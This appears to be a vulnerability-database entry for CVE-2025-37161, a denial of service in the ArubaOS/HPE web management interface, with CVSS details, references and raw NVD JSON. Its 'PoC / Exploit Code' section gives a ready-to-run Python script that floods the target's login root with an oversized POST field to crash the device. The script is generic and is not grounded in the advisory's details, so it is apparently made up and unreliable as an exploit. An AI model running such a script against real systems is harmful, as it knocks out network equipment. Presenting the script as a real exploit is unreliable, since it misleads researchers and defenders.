CVE-2025-37161

Description

A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE

HPE产品（具体版本需参考HPE官方安全公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-37161 PoC - DoS against HPE Web Management Interface
# Usage: python poc.py <target_ip> <port>

def check_vulnerability(target, port=443):
    """Check if target is vulnerable"""
    url = f"https://{target}:{port}/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-37161-PoC)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # Malformed request that triggers DoS condition
    payload = {
        'action': 'submit',
        'data': 'A' * 10000  # Oversized payload
    }
    
    try:
        print(f"[*] Sending DoS payload to {url}")
        response = requests.post(url, data=payload, headers=headers, timeout=10, verify=False)
        print(f"[+] Request sent, status code: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[!] Target may be experiencing DoS condition (timeout)")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    check_vulnerability(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37161
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37161
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37161/
[4] VulDB https://vuldb.com/cve/CVE-2025-37161
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37161", "sourceIdentifier": "[email protected]", "published": "2025-11-18T20:15:46.180", "lastModified": "2026-02-13T16:31:47.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of affected products could allow an unauthenticated remote attacker to cause a denial of service. Successful exploitation could allow an attacker to crash the system, preventing it from rebooting without manual intervention and disrupting network operations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.7.2.0", "matchCriteriaId": "E1D4DF06-641C-40FD-AC80-F104B0319E2E"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}